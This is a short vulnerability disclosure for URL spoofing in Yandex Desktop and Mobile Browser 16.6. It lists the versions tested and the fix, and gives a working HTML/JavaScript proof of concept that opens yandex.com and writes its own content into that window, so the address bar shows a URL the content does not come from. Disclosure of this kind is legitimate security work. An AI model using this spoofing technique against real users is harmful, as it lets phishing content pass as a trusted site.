Yandex Desktop & Mobile Browser URL Spoofing
# Title: Yandex Desktop & Mobile Browser URL Spoofing
# Vendor: https://browser.yandex.com/
# Author: Patryk Bogdan

Tested on:
  Yandex Desktop Browser 16.6.0.8608 (Windows)
  Yandex Mobile Browser Alpha 16.6.1.8686 (Android)
  Yandex Mobile Browser Beta 16.6.0.8802 (Android)

Fix: Update to version 16.9.0

PoC:

<html>
<head>
<title>Yandex Desktop & Mobile Browser URL Spoofing</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
</head>
<body>
<button id="poc">Run PoC</button>
<script type="text/javascript">
document.getElementById('poc').onclick = function() {
  // Open the target URL in a new window, then write page-controlled
  // content into that window; on affected versions the address bar
  // keeps showing the opened URL while displaying this content.
  var win = window.open('http://yandex.com/');
  win.document.write("Hello, this is spoofed content.");
}
</script>
</body>
</html>